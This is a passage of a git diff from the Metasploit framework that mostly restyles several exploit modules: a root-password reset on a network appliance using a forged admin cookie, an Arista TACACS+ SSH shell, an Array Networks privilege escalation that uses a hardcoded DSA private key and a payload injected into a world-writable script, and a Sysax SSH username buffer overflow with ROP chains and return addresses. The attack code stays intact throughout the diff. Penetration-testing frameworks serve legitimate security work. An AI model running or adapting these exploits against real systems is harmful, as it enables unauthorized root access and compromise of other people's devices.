xmlResponse.include?('NET5504') || xmlResponse.include?('NET5500') || xmlResponse.include?('NET5516') || xmlResponse.include?('NET5508') return Exploit::CheckCode::Appears end - CheckCode::Safe + + CheckCode::Safe end def change_password print_status("#{peer} - Attempt to change the root password...") - post = {enable: true, passwd: new_password, userid: "root"}.to_json + post = { enable: true, passwd: new_password, userid: 'root' }.to_json login = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), + 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), 'data' => post, 'headers' => { - 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647', - 'Content-Type' => 'application/json;charset=utf-8' + 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647', + 'Content-Type' => 'application/json;charset=utf-8' } - }, timeout=datastore['TIMEOUT']) + }, timeout = datastore['TIMEOUT']) - fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 + fail_with(Failure::UnexpectedReply, 'Failed to change root password') unless login && login.code == 200 print_good("#{rhost}:80 - Successfully changed the root password...") print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}") end @@ -117,18 +119,12 @@ class MetasploitModule < Msf::Exploit::Remote def do_login change_password print_status("#{rhost}:22 - Attempt to start a SSH connection...") - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => 22, - :use_agent => false, - :config => true, - :password => new_password, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: 22, + password: new_password + }) + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do diff --git a/modules/exploits/unix/ssh/arista_tacplus_shell.rb b/modules/exploits/unix/ssh/arista_tacplus_shell.rb index 2713ac58ae..286c0b182f 100644 --- a/modules/exploits/unix/ssh/arista_tacplus_shell.rb +++ b/modules/exploits/unix/ssh/arista_tacplus_shell.rb @@ -44,7 +44,12 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'linux', 'PayloadType' => 'cmd_interact', 'Privileged' => true, - 'Targets' => [ [ 'Universal', {} ] ] + 'Targets' => [ [ 'Universal', {} ] ], + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } ) ) @@ -67,17 +72,11 @@ class MetasploitModule < Msf::Exploit::Remote end def check - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password', 'keyboard-interactive'], port: rport, - use_agent: false, - config: false, - password: password, - proxy: factory, - non_interactive: true, - verify_host_key: :never - } + password: password + }) begin ::Timeout.timeout(datastore['SSH_TIMEOUT']) do diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 18aff01a26..078f2a6153 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -12,50 +12,49 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::EXE include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution", - 'Description' => %q{ - This module exploits a default hardcoded private SSH key or default hardcoded - login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made - by Array Networks. After logged in as the unprivileged user, it's possible to modify - the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code. - Execution is possible by using the backend tool, running setuid, to turn the debug - monitoring on. This makes it possible to trigger a payload with root privileges. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'xistence ', # Original discovery and Metasploit module + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution', + 'Description' => %q{ + This module exploits a default hardcoded private SSH key or default hardcoded + login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made + by Array Networks. After logged in as the unprivileged user, it's possible to modify + the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code. + Execution is possible by using the backend tool, running setuid, to turn the debug + monitoring on. This makes it possible to trigger a payload with root privileges. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'xistence ', # Original discovery and Metasploit module ], - 'References' => - [ + 'References' => [ ['OSVDB', '104652'], ['OSVDB', '104653'], ['OSVDB', '104654'], ['PACKETSTORM', '125761'] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Payload' => - { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => { 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic telnet', - } + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet' + } }, - 'Targets' => - [ + 'Targets' => [ ['vAPV 8.3.2.17 / vxAG 9.2.0.34', {}], ], - 'Privileged' => true, - 'DisclosureDate' => '2014-02-03', - 'DefaultTarget' => 0)) + 'Privileged' => true, + 'DisclosureDate' => '2014-02-03', + 'DefaultTarget' => 0 + ) + ) register_options( [ @@ -99,17 +98,11 @@ class MetasploitModule < Msf::Exploit::Remote key_data += "+sqSEhA35Le2kC4Y1/A=\n" key_data += "-----END DSA PRIVATE KEY-----\n" - factory = ssh_socket_factory - opts = { - :auth_methods => ['publickey'], - :port => rport, - :use_agent => false, - :config => true, - :key_data => key_data, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: key_data + }) opts end @@ -118,14 +111,14 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{rhost}:#{rport} - Attempting to login with '#{user}:#{pass}'") factory = ssh_socket_factory opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => true, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + use_agent: false, + config: true, + password: pass, + proxy: factory, + non_interactive: true, + verify_host_key: :never } opts @@ -133,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote def build_command mon_temp = rand_text_alphanumeric(10) - cmd = Rex::Text.encode_base64("nohup " + payload.encoded) + cmd = Rex::Text.encode_base64('nohup ' + payload.encoded) # Turn debug monitoring off, just in case it's turned on command = '/ca/bin/backend -c "debug monitor off"`echo -e "\0374"`;' # Copy the data from monitor.sh to a random tmp file @@ -148,8 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote command end - - #def execute_command(cmd, opts) + # def execute_command(cmd, opts) def exploit user = datastore['USER'] pass = datastore['PASS'] @@ -160,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote opts = login_user_pass(user, pass) end - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index 63f02bef64..8d9a1e1a9e 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb @@ -13,57 +13,52 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => "Sysax 5.53 SSH Username Buffer Overflow", - 'Description' => %q{ - This module exploits a vulnerability found in Sysax's SSH service. By + 'Name' => 'Sysax 5.53 SSH Username Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability found in Sysax's SSH service. By supplying a long username, the SSH server will copy that data on the stack without proper bounds checking, therefore allowing remote code execution under the context of the user. Please note that previous versions (before 5.53) are also affected by this bug. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ + 'Craig Freyman', # Initial discovery, PoC + 'sinn3r' # Metasploit + ], + 'References' => [ + ['OSVDB', '79689'], + ['URL', 'http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html'], + ['EDB', '18535'] + ], + 'Payload' => { + 'Space' => 1024, + 'BadChars' => "\x00\x3a", + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => { + 'EXITFUNC' => 'seh' + }, + 'Platform' => 'win', + 'Targets' => [ [ - 'Craig Freyman', # Initial discovery, PoC - 'sinn3r' # Metasploit + 'Sysax 5.53 on Win XP SP3 / Win2k3 SP0', + { + 'Rop' => false, + 'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe + } ], - 'References' => [ - ['OSVDB', '79689'], - ['URL', 'http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html'], - ['EDB', '18535'] - ], - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00\x3a", - 'StackAdjustment' => -3500 - }, - 'DefaultOptions' => - { - 'EXITFUNC' => "seh" - }, - 'Platform' => 'win', - 'Targets' => - [ - [ - 'Sysax 5.53 on Win XP SP3 / Win2k3 SP0', - { - 'Rop' => false, - 'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe - } - ], - [ - 'Sysax 5.53 on Win2K3 SP1/SP2', - { - 'Rop' => true, - 'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN - } - ] - ], - 'Privileged' => false, + 'Sysax 5.53 on Win2K3 SP1/SP2', + { + 'Rop' => true, + 'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN + } + ] + ], + 'Privileged' => false, 'DisclosureDate' => '2012-02-27', - 'DefaultTarget' => 0 + 'DefaultTarget' => 0 ) ) @@ -78,11 +73,11 @@ class MetasploitModule < Msf::Exploit::Remote banner = sock.get_once(-1, 5) || '' disconnect vprint_status("Banner: #{banner}") - if banner.match?(/SSH\-2\.0\-SysaxSSH_1\.0/) + if banner.match?(/SSH-2\.0-SysaxSSH_1\.0/) return Exploit::CheckCode::Appears end - rescue - vprint_error("An error has occurred while trying to read a response from target") + rescue StandardError + vprint_error('An error has occurred while trying to read a response from target') return Exploit::CheckCode::Unknown end @@ -93,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote # # Align the stack to the beginning of the fixed size payload # - align = "\x54" # PUSH ESP + align = "\x54" # PUSH ESP align << "\x58" # POP EAX align << "\x04\x08" # ADD AL,0x08 align << "\x8b\x18" # MOV EBX, [EAX] @@ -128,8 +123,8 @@ class MetasploitModule < Msf::Exploit::Remote end def generate_rop_exploit - junk = rand_text(4).unpack("L")[0].to_i - nop = make_nops(4).unpack("L")[0].to_i + junk = rand_text(4).unpack('L')[0].to_i + nop = make_nops(4).unpack('L')[0].to_i # !mona rop -m msvcrt p = @@ -158,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote 0x77bb2563, # POP EAX # RETN nop, 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") + ].pack('V*') p << payload.encoded @@ -211,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote print_error("Cannot establish a connection on #{rhost}:#{rport}") return rescue StandardError => e - if e.message.match?(/fingerprint [0-9a-z\:]+ does not match/) + if e.message.match?(/fingerprint [0-9a-z:]+ does not match/) print_error("Please remove #{rhost}:#{rport} from your known_hosts list") return end diff --git a/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb b/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb index 7f4d8b94c9..d4ebb5aa2c 100644 --- a/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb +++ b/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb @@ -143,6 +143,7 @@ RSpec.describe Metasploit::Framework::LoginScanner::SSH do :config => false, :verbose => ssh_scanner.verbosity, :proxy => factory, + :append_all_supported_algorithms => true, :auth_methods => ['password','keyboard-interactive'], :password => private, :non_interactive => true,